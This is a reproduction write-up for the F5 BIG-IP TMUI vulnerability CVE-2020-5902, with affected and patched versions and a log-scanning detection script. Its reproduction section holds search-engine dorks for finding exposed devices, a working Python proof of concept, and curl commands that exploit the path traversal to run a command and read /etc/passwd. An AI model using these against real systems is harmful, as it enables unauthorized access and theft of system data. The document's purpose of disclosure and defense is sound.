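CVE-2020-5902 | F5 BIG-IP File Read Vulnerability Reproduction
Vulnerability Reproduction | F5 BIG-IP TMUI (CVE-2020-5902)
0x1 Vulnerability Overview
F5 BIG-IP is an application delivery platform from the US company F5 that integrates network traffic management, application security management, load balancing and other functions. F5 recently disclosed a remote code execution vulnerability (CVE-2020-5902) in specific pages of the Traffic Management User Interface (TMUI) utility.
0x2 Affected Versions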
BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5
0x3 Reproduction
Search engines
shodan
http.favicon.hash:-335242539
fofa
title="BIG-IP®- Redirect"
google
intitle:"BIG-IP" inurl:"tmui"
Python POC
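#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# F5 BIG-IP TMUI (CVE-2020-5902) remote command execution, arbitrary file read
import os

import requests

# The management interface usually presents a self-signed certificate,
# so certificate verification is disabled and the warning is silenced.
requests.packages.urllib3.disable_warnings()


def poc(url):
    pocName = os.path.basename(__file__)
    # Default to http:// when no scheme is given.
    if not url.startswith("http"):
        url = "http://" + url
    headers = {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept-Encoding": "gzip,deflate",
    }
    # The "..;" path segment after login.jsp is what reaches fileRead.jsp without authentication.
    payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"
    res = requests.get(url + payload, headers=headers, verify=False)
    # A 200 response containing the release banner marks the host as vulnerable.
    if res.status_code == 200 and "BIG-IP release" in res.text:
        return "[{}] => {} ".format(pocName, res.url)


if __name__ == '__main__':
    print(poc("https://x.x.x.x/"))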
RCE:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Read File:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
0x4 Remediation
General patching advice:
Upgrade to the following versions:
BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
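Both requests in section 0x3 rely on the `/tmui/login.jsp/..;/` path segment, so web access logs can be checked for it while the upgrade is rolled out. The following is an added example, not code from the original post: it assumes Apache combined log format, the sample lines are constructed, and the names `find_tmui_traversal` and `fully_unquote` are hypothetical.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache combined log format (assumed format, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [06/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [06/Jul/2020:10:03:17 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1834 "-" "curl/7.68.0"
192.0.2.44 - - [06/Jul/2020:10:03:40 +0000] "GET /tmui/login.jsp/%2e%2e%3b/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 912 "-" "curl/7.68.0"
198.51.100.7 - - [06/Jul/2020:10:05:00 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp HTTP/1.1" 404 0 "-" "python-requests/2.24.0"
203.0.113.5 - - [06/Jul/2020:10:06:11 +0000] "GET /index.html HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# client IP, request method, request target and status code of one combined-format line
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def fully_unquote(s, rounds=3):
    """Percent-decode repeatedly so paths logged in encoded form are normalised."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def find_tmui_traversal(log_text):
    """Return one dict per request whose path holds a '..;' segment under /tmui/."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = fully_unquote(urlsplit(m["target"]).path)
        segments = path.split("/")
        if "tmui" in segments and any(seg.startswith("..;") for seg in segments):
            hits.append({
                "ip": m["ip"],
                "endpoint": segments[-1],         # JSP reached behind the login page
                "served": m["status"] == "200",   # True means the device answered the request
            })
    return hits

if __name__ == "__main__":
    for hit in find_tmui_traversal(SAMPLE_LOG):
        print(hit)
```

Hits with `served` set to True are the ones to investigate first, since the device returned content for a request that should have required a login.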
Reference: https://mp.weixin.qq.com/s/EehD7J0LEHX1AY2HTRtVgw
Reference: https://cert.360.cn/warning/detail?id=a1768348bde7807647cbc7232edce7df